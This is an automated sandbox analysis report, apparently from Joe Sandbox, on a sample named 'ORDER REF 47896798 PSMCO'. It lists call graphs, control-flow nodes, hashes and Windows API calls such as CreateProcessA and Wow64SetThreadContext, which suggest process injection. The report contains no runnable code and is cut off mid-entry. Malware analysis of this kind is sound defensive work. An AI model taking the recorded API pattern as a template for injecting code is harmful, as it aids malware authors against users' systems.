38750->38748 38752 7839a1d 38751->38752 38754 7837020 Wow64SetThreadContext 38752->38754 38755 7837018 Wow64SetThreadContext 38752->38755 38753 7839a33 38753->38681 38754->38753 38755->38753 38557 7ef1570 38558 7ef1591 38557->38558 38559 7ef15a9 38558->38559 38563 7ef2111 38558->38563 38570 7ef2120 38558->38570 38560 7ef16bc 38564 7ef211e 38563->38564 38568 7ef2157 DrawTextExW 38563->38568 38565 7ef213d 38564->38565 38573 7ef0b7c 38564->38573 38565->38560 38569 7ef21fe 38568->38569 38569->38560 38571 7ef0b7c DrawTextExW 38570->38571 38572 7ef213d 38571->38572 38572->38560 38574 7ef2158 DrawTextExW 38573->38574 38576 7ef21fe 38574->38576 38576->38565 38577 7ef2cf0 38578 7ef2d2a 38577->38578 38579 7ef2dbb 38578->38579 38580 7ef2da6 38578->38580 38582 7ef0be4 3 API calls 38579->38582 38585 7ef0be4 38580->38585 38584 7ef2dca 38582->38584 38587 7ef0bef 38585->38587 38586 7ef2db1 38587->38586 38590 7ef3700 38587->38590 38596 7ef3710 38587->38596 38602 7ef0c2c 38590->38602 38593 7ef3737 38593->38586 38594 7ef374f CreateIconFromResourceEx 38595 7ef37de 38594->38595 38595->38586 38597 7ef372a 38596->38597 38598 7ef0c2c CreateIconFromResourceEx 38596->38598 38599 7ef374f CreateIconFromResourceEx 38597->38599 38600 7ef3737 38597->38600 38598->38597 38601 7ef37de 38599->38601 38600->38586 38601->38586 38603 7ef3760 CreateIconFromResourceEx 38602->38603 38604 7ef372a 38603->38604 38604->38593 38604->38594

                                                                                            Executed Functions

                                                                                            Function 07EF99F8 Relevance: 2.3, Strings: 1, Instructions: 1029COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 44 7ef99f8-7ef9a19 45 7ef9a1b 44->45 46 7ef9a20-7ef9b0c 44->46 45->46 49 7efa339-7efa361 46->49 50 7ef9b12-7ef9c66 46->50 53 7efaa43-7efaa4c 49->53 94 7ef9c6c-7ef9cc7 50->94 95 7efa307-7efa337 50->95 55 7efa36f-7efa378 53->55 56 7efaa52-7efaa69 53->56 58 7efa37f-7efa458 55->58 59 7efa37a 55->59 217 7efa45e call 7efac9a 58->217 218 7efa45e call 7efaca8 58->218 219 7efa45e call 7eface7 58->219 59->58 75 7efa464-7efa471 76 7efa49b 75->76 77 7efa473-7efa47f 75->77 81 7efa4a1-7efa4c0 76->81 79 7efa489-7efa48f 77->79 80 7efa481-7efa487 77->80 83 7efa499 79->83 80->83 86 7efa4c2-7efa51b 81->86 87 7efa520-7efa598 81->87 83->81 98 7efaa40 86->98 105 7efa5ef-7efa632 87->105 106 7efa59a-7efa5ed 87->106 102 7ef9ccc-7ef9cd7 94->102 103 7ef9cc9 94->103 95->49 98->53 107 7efa21b-7efa221 102->107 103->102 135 7efa63d-7efa643 105->135 106->135 108 7ef9cdc-7ef9cfa 107->108 109 7efa227-7efa2a4 107->109 112 7ef9cfc-7ef9d00 108->112 113 7ef9d51-7ef9d66 108->113 153 7efa2f1-7efa2f7 109->153 112->113 117 7ef9d02-7ef9d0d 112->117 118 7ef9d6d-7ef9d83 113->118 119 7ef9d68 113->119 123 7ef9d43-7ef9d49 117->123 120 7ef9d8a-7ef9da1 118->120 121 7ef9d85 118->121 119->118 126 7ef9da8-7ef9dbe 120->126 127 7ef9da3 120->127 121->120 128 7ef9d0f-7ef9d13 123->128 129 7ef9d4b-7ef9d4c 123->129 133 7ef9dc5-7ef9dcc 126->133 134 7ef9dc0 126->134 127->126 131 7ef9d19-7ef9d31 128->131 132 7ef9d15 128->132 136 7ef9dcf-7ef9e40 129->136 138 7ef9d38-7ef9d40 131->138 139 7ef9d33 131->139 132->131 133->136 134->133 140 7efa69a-7efa6a6 135->140 141 7ef9e56-7ef9fce 136->141 142 7ef9e42 136->142 138->123 139->138 143 7efa6a8-7efa72f 140->143 144 7efa645-7efa667 140->144 150 7ef9fe4-7efa11f 141->150 151 7ef9fd0 141->151 142->141 145 7ef9e44-7ef9e50 142->145 175 7efa8b4-7efa8bd 143->175 148 7efa66e-7efa697 144->148 149 7efa669 144->149 145->141 148->140 149->148 164 7efa183-7efa198 150->164 165 7efa121-7efa125 150->165 151->150 154 7ef9fd2-7ef9fde 151->154 155 7efa2f9-7efa2ff 153->155 156 7efa2a6 153->156 154->150 155->95 220 7efa2ac call 7efab78 156->220 221 7efa2ac call 7efabe1 156->221 222 7efa2ac call 7efabf0 156->222 161 7efa2b2-7efa2ee 161->153 167 7efa19f-7efa1c0 164->167 168 7efa19a 164->168 165->164 169 7efa127-7efa136 165->169 172 7efa1c7-7efa1e6 167->172 173 7efa1c2 167->173 168->167 174 7efa175-7efa17b 169->174 180 7efa1ed-7efa20d 172->180 181 7efa1e8 172->181 173->172 176 7efa17d-7efa17e 174->176 177 7efa138-7efa13c 174->177 178 7efa734-7efa749 175->178 179 7efa8c3-7efa91e 175->179 182 7efa218 176->182 183 7efa13e-7efa142 177->183 184 7efa146-7efa167 177->184 185 7efa74b 178->185 186 7efa752-7efa8a8 178->186 203 7efa955-7efa97f 179->203 204 7efa920-7efa953 179->204 187 7efa20f 180->187 188 7efa214 180->188 181->180 182->107 183->184 190 7efa16e-7efa172 184->190 191 7efa169 184->191 185->186 192 7efa79d-7efa7dd 185->192 193 7efa758-7efa798 185->193 194 7efa827-7efa867 185->194 195 7efa7e2-7efa822 185->195 207 7efa8ae 186->207 187->188 188->182 190->174 191->190 192->207 193->207 194->207 195->207 212 7efa988-7efaa34 203->212 204->212 207->175 212->98 217->75 218->75 219->75 220->161 221->161 222->161
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \ lw
                                                                                            • API String ID: 0-2684086738
                                                                                            • Opcode ID: 700c2afc1bc16e32a09e1181c567e8ed9603903b4f9ac14cd0369be049b852e6
                                                                                            • Instruction ID: 00264be1b04b4b6d4841cf9eef74c11f4edaa8bf9ec7794d56d4e87c3e1a5a78
                                                                                            • Opcode Fuzzy Hash: 700c2afc1bc16e32a09e1181c567e8ed9603903b4f9ac14cd0369be049b852e6
                                                                                            • Instruction Fuzzy Hash: 5EB2C275E01628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                                                                            Function 07EF0BE4 Relevance: .6, Instructions: 622COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6da82916401ae1dae97a391235bf0ab6fa17d0aed36f538b2c4c2ba7e8fe6da9
                                                                                            • Instruction ID: 5fa7268a3ee64bcbaaf6b6d84c6cda76a45c95017ce5d66be473cc29828b9efb
                                                                                            • Opcode Fuzzy Hash: 6da82916401ae1dae97a391235bf0ab6fa17d0aed36f538b2c4c2ba7e8fe6da9
                                                                                            • Instruction Fuzzy Hash: C4326EB0E012198FEB54DFA8C8507AEBBF2BFC4700F14856AD509AB385DB349D85CB95
                                                                                            Function 0783AA10 Relevance: .4, Instructions: 395COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 75fc928f214d679b41db4fbe063b002fee09f11253468e76271beff51933ca7d
                                                                                            • Instruction ID: 123adcb81ea3f4af6d9b6293b6acd4b7a85b810874c9ba77e1283e1eb96e440f
                                                                                            • Opcode Fuzzy Hash: 75fc928f214d679b41db4fbe063b002fee09f11253468e76271beff51933ca7d
                                                                                            • Instruction Fuzzy Hash: 8DE1BAB17012058FDB29DB79C454BAEB7FAAF99300F14846DE186EB395DB34D801CB92
                                                                                            Function 07EF2DD9 Relevance: .3, Instructions: 281COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5c7183ca1de9fd6f2aaba25801f7a7a8a30292bbb58e2e2e6ba91c8cef096fb9
                                                                                            • Instruction ID: b7f36691da3691eea877df73c44e82f311059415d568b84972f62edfba34a193
                                                                                            • Opcode Fuzzy Hash: 5c7183ca1de9fd6f2aaba25801f7a7a8a30292bbb58e2e2e6ba91c8cef096fb9
                                                                                            • Instruction Fuzzy Hash: CDC169B1E02215CFDF14CFA8C88079DBBB2BF88304F14D1AAD609AB655DB309985CF51
                                                                                            Function 07EF0BDE Relevance: .3, Instructions: 281COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c33a3c950441032b49411f3fe981238f1ce986cb50ad14389633734e58d3aa8a
                                                                                            • Instruction ID: b2631a98b26545918f345044b494614114bf4698fcf2782165c260f2c30a5231
                                                                                            • Opcode Fuzzy Hash: c33a3c950441032b49411f3fe981238f1ce986cb50ad14389633734e58d3aa8a
                                                                                            • Instruction Fuzzy Hash: 83C16AB0E02219CFDF14CFA9C88079DBBB2BF89304F14D1AAD609AB655DB309985CF51
                                                                                            Function 07EFBF30 Relevance: .2, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0527b592d3403c0106112dcce9fd0b2163f5fc8287915a202ff262cbd2e980e0
                                                                                            • Instruction ID: 1d294b85a89ec9c7af14795ed85fbab47c111cbd0463b6df0429db306633a0da
                                                                                            • Opcode Fuzzy Hash: 0527b592d3403c0106112dcce9fd0b2163f5fc8287915a202ff262cbd2e980e0
                                                                                            • Instruction Fuzzy Hash: 3A6125B5D1A20DCFDB14CFA9C8806EEBBB6FF8A300F20A029D619A7611D7345942CF51
                                                                                            Function 07837896 Relevance: .1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5347ec4d25682db82d72cb6de97770d803ea5bab7556fb94258e0b120a4749a5
                                                                                            • Instruction ID: 2cc495d1210c2d433e2b1d25d98f12e29710017170a09d4ffe3c949c515cd2a7
                                                                                            • Opcode Fuzzy Hash: 5347ec4d25682db82d72cb6de97770d803ea5bab7556fb94258e0b120a4749a5
                                                                                            • Instruction Fuzzy Hash: CC4181B4829249CFDB10CF28D8847ECBBB8FB1B214F1052A5D559E3292DB389985CF91
                                                                                            Function 0173D309 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0173D396
                                                                                            • GetCurrentThread.KERNEL32 ref: 0173D3D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0173D410
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0173D469
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 060861b60d2c85f6c58708028150c605ca7e16e5ff91d033565908366017f585
                                                                                            • Instruction ID: 1840c996b7f7a2b064087e9a24d2e28d61b737ffb3dd8e403757854e1ed49c7f
                                                                                            • Opcode Fuzzy Hash: 060861b60d2c85f6c58708028150c605ca7e16e5ff91d033565908366017f585
                                                                                            • Instruction Fuzzy Hash: 685195B090134ACFEB14CFA9D548BEEBBF1FF88314F208459D409A7260DB78A844CB65
                                                                                            Function 0173D318 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0173D396
                                                                                            • GetCurrentThread.KERNEL32 ref: 0173D3D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0173D410
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0173D469
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 978206f9b4f569f3751b318623391ae2a70779522ebd1b731a3143e4ef2fa698
                                                                                            • Instruction ID: ec0bbb1cb288c323dc1dc34281eaadb7007249f3fe8ab13775f4982223976d92
                                                                                            • Opcode Fuzzy Hash: 978206f9b4f569f3751b318623391ae2a70779522ebd1b731a3143e4ef2fa698
                                                                                            • Instruction Fuzzy Hash: 5D5175B0901349CFDB14DFA9D548BEEBBF1FF88314F208459D419A7260DB746944CB65
                                                                                            Function 07837435 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 223 7837435-78374d5 226 78374d7-78374e1 223->226 227 783750e-783752e 223->227 226->227 228 78374e3-78374e5 226->228 232 7837530-783753a 227->232 233 7837567-7837596 227->233 230 78374e7-78374f1 228->230 231 7837508-783750b 228->231 234 78374f3 230->234 235 78374f5-7837504 230->235 231->227 232->233 237 783753c-783753e 232->237 241 7837598-78375a2 233->241 242 78375cf-7837689 CreateProcessA 233->242 234->235 235->235 236 7837506 235->236 236->231 238 7837561-7837564 237->238 239 7837540-783754a 237->239 238->233 243 783754e-783755d 239->243 244 783754c 239->244 241->242 245 78375a4-78375a6 241->245 255 7837692-7837718 242->255 256 783768b-7837691 242->256 243->243 246 783755f 243->246 244->243 247 78375c9-78375cc 245->247 248 78375a8-78375b2 245->248 246->238 247->242 250 78375b6-78375c5 248->250 251 78375b4 248->251 250->250 252 78375c7 250->252 251->250 252->247 266 783771a-783771e 255->266 267 7837728-783772c 255->267 256->255 266->267 268 7837720 266->268 269 783772e-7837732 267->269 270 783773c-7837740 267->270 268->267 269->270 271 7837734 269->271 272 7837742-7837746 270->272 273 7837750-7837754 270->273 271->270 272->273 276 7837748 272->276 274 7837766-783776d 273->274 275 7837756-783775c 273->275 277 7837784 274->277 278 783776f-783777e 274->278 275->274 276->273 280 7837785 277->280 278->277 280->280
                                                                                            APIs
                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07837676
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 109fb6597e1c15af0c3dfa12fbc109bb748fe366bb63d55c06fbf890386d1645
                                                                                            • Instruction ID: ae72ce8e3afecf25ab05147a8ee3b3d47b9a7a04ad4035fcc240b028b1cfa683
                                                                                            • Opcode Fuzzy Hash: 109fb6597e1c15af0c3dfa12fbc109bb748fe366bb63d55c06fbf890386d1645
                                                                                            • Instruction Fuzzy Hash: A0912AB1D0121ADFEB14DF68C885B9DBBB2BF58310F14856AE818E7240DB749985CF92
                                                                                            Function 07837440 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 281 7837440-78374d5 283 78374d7-78374e1 281->283 284 783750e-783752e 281->284 283->284 285 78374e3-78374e5 283->285 289 7837530-783753a 284->289 290 7837567-7837596 284->290 287 78374e7-78374f1 285->287 288 7837508-783750b 285->288 291 78374f3 287->291 292 78374f5-7837504 287->292 288->284 289->290 294 783753c-783753e 289->294 298 7837598-78375a2 290->298 299 78375cf-7837689 CreateProcessA 290->299 291->292 292->292 293 7837506 292->293 293->288 295 7837561-7837564 294->295 296 7837540-783754a 294->296 295->290 300 783754e-783755d 296->300 301 783754c 296->301 298->299 302 78375a4-78375a6 298->302 312 7837692-7837718 299->312 313 783768b-7837691 299->313 300->300 303 783755f 300->303 301->300 304 78375c9-78375cc 302->304 305 78375a8-78375b2 302->305 303->295 304->299 307 78375b6-78375c5 305->307 308 78375b4 305->308 307->307 309 78375c7 307->309 308->307 309->304 323 783771a-783771e 312->323 324 7837728-783772c 312->324 313->312 323->324 325 7837720 323->325 326 783772e-7837732 324->326 327 783773c-7837740 324->327 325->324 326->327 328 7837734 326->328 329 7837742-7837746 327->329 330 7837750-7837754 327->330 328->327 329->330 333 7837748 329->333 331 7837766-783776d 330->331 332 7837756-783775c 330->332 334 7837784 331->334 335 783776f-783777e 331->335 332->331 333->330 337 7837785 334->337 335->334 337->337
                                                                                            APIs
                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07837676
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 50e4ed0ce4e32b3b0a04956f1f4b362274a65d0b1688b658d2205990c0da3391
                                                                                            • Instruction ID: f304e7331671df37a948a976416e78c4ddd1fb495c06b5fcd04b0057a0e8f1d7
                                                                                            • Opcode Fuzzy Hash: 50e4ed0ce4e32b3b0a04956f1f4b362274a65d0b1688b658d2205990c0da3391
                                                                                            • Instruction Fuzzy Hash: E0913BB1D0021ADFEF14DF68C885B9DBAB2BF58310F14856AE818E7240DB749985CF92
                                                                                            Function 0173B352 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 338 173b352-173b37f 339 173b381-173b38e call 1739eec 338->339 340 173b3ab-173b3af 338->340 347 173b390 339->347 348 173b3a4 339->348 341 173b3c3-173b404 340->341 342 173b3b1-173b3bb 340->342 349 173b411-173b41f 341->349 350 173b406-173b40e 341->350 342->341 393 173b396 call 173b5f9 347->393 394 173b396 call 173b608 347->394 348->340 351 173b443-173b445 349->351 352 173b421-173b426 349->352 350->349 354 173b448-173b44f 351->354 355 173b431 352->355 356 173b428-173b42f call 1739ef8 352->356 353 173b39c-173b39e 353->348 357 173b4e0-173b5a0 353->357 358 173b451-173b459 354->358 359 173b45c-173b463 354->359 361 173b433-173b441 355->361 356->361 388 173b5a2-173b5a5 357->388 389 173b5a8-173b5d3 GetModuleHandleW 357->389 358->359 362 173b470-173b479 call 1739f08 359->362 363 173b465-173b46d 359->363 361->354 369 173b486-173b48b 362->369 370 173b47b-173b483 362->370 363->362 371 173b4a9-173b4b6 369->371 372 173b48d-173b494 369->372 370->369 378 173b4d9-173b4df 371->378 379 173b4b8-173b4d6 371->379 372->371 374 173b496-173b4a6 call 1739f18 call 173af5c 372->374 374->371 379->378 388->389 390 173b5d5-173b5db 389->390 391 173b5dc-173b5f0 389->391 390->391 393->353 394->353
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0173B5C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 16564b0067fa6342a4f1fd3e369becb1d770ed06e6ed241a569d466584dfa6fb
                                                                                            • Instruction ID: bf9f3936687a711d2ad82fc3fe2bc4069c6bb18a3c3a44e1478c7e2279e82f38
                                                                                            • Opcode Fuzzy Hash: 16564b0067fa6342a4f1fd3e369becb1d770ed06e6ed241a569d466584dfa6fb
                                                                                            • Instruction Fuzzy Hash: AF8175B0A00B458FDB24DF29D44479ABBF1FF88304F10892ED48AD7A52D774E809CB95
                                                                                            Function 0173590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 395 173590c-1735916 396 1735918-17359d9 CreateActCtxA 395->396 398 17359e2-1735a3c 396->398 399 17359db-17359e1 396->399 406 1735a4b-1735a4f 398->406 407 1735a3e-1735a41 398->407 399->398 408 1735a51-1735a5d 406->408 409 1735a60 406->409 407->406 408->409 411 1735a61 409->411 411->411
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 017359C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 5f1a9c09987a22eb82dcd4cf2fc57d1a8a87ba833367647b83968991cdbfd8d6
                                                                                            • Instruction ID: 44b7e03fd18ba59f1cea29f61036e236c299855f37028abe58604354000e7f29
                                                                                            • Opcode Fuzzy Hash: 5f1a9c09987a22eb82dcd4cf2fc57d1a8a87ba833367647b83968991cdbfd8d6
                                                                                            • Instruction Fuzzy Hash: 3B41E2B0C0171DCBDB24CFA9C984B8EBBB5BF85704F20816AD408AB251DB756946CF90
                                                                                            Function 017344F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 412 17344f0-17359d9 CreateActCtxA 415 17359e2-1735a3c 412->415 416 17359db-17359e1 412->416 423 1735a4b-1735a4f 415->423 424 1735a3e-1735a41 415->424 416->415 425 1735a51-1735a5d 423->425 426 1735a60 423->426 424->423 425->426 428 1735a61 426->428 428->428
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 017359C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: d8ac9e750ed304d1a96e107037705b0d315e310f7462918f2a434f02fb77cd43
                                                                                            • Instruction ID: 99f8cb84ff5abae53bf2d1c27120fd92cb494786a410ed4094ab86eb2239fe68
                                                                                            • Opcode Fuzzy Hash: d8ac9e750ed304d1a96e107037705b0d315e310f7462918f2a434f02fb77cd43
                                                                                            • Instruction Fuzzy Hash: 2E41D2B0C0071DCBDB24CFA9C98479EBBF5BF89704F24816AD409AB251DB756946CF90
                                                                                            Function 07EF2111 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 429 7ef2111-7ef211c 430 7ef211e-7ef2136 429->430 431 7ef2157-7ef21a4 429->431 432 7ef213d-7ef213f 430->432 433 7ef2138 call 7ef0b7c 430->433 434 7ef21af-7ef21be 431->434 435 7ef21a6-7ef21ac 431->435 433->432 436 7ef21c3-7ef21fc DrawTextExW 434->436 437 7ef21c0 434->437 435->434 438 7ef21fe-7ef2204 436->438 439 7ef2205-7ef2222 436->439 437->436 438->439
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07EF213D,?,?), ref: 07EF21EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: 01de15f41a75b7889333decd851f7ff8cfb5bed0aa7b05c6319cf6fb8b04180f
                                                                                            • Instruction ID: 05c6537b3cec55759c35f2c2e562cc61e033f584c7cdef32dacf35a6b6461fcb
                                                                                            • Opcode Fuzzy Hash: 01de15f41a75b7889333decd851f7ff8cfb5bed0aa7b05c6319cf6fb8b04180f
                                                                                            • Instruction Fuzzy Hash: 543128B6901209AFDB01CF99D940ADEBBF5FF48320F14845AEA18A7611D3759954CFA0
                                                                                            Function 07EF3710 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 442 7ef3710-7ef3722 443 7ef372a-7ef3735 442->443 444 7ef3725 call 7ef0c2c 442->444 445 7ef374a-7ef37dc CreateIconFromResourceEx 443->445 446 7ef3737-7ef3747 443->446 444->443 449 7ef37de-7ef37e4 445->449 450 7ef37e5-7ef3802 445->450 449->450
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFromIconResource
                                                                                            • String ID:
                                                                                            • API String ID: 3668623891-0
                                                                                            • Opcode ID: ea8fe8753e4caebddaeadf21d653dbe5135ba2377334ea855b710c303268e529
                                                                                            • Instruction ID: 7e1ed0c323cb060ec4d20559307a5396f3b44cb5d3cd7d222d975ea5efc6a6df
                                                                                            • Opcode Fuzzy Hash: ea8fe8753e4caebddaeadf21d653dbe5135ba2377334ea855b710c303268e529
                                                                                            • Instruction Fuzzy Hash: 693198B29013499FCB01CFA9D844AEABFF8EF09320F14845AEA54A7661C3359850CFA0
                                                                                            Function 07EF0B7C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
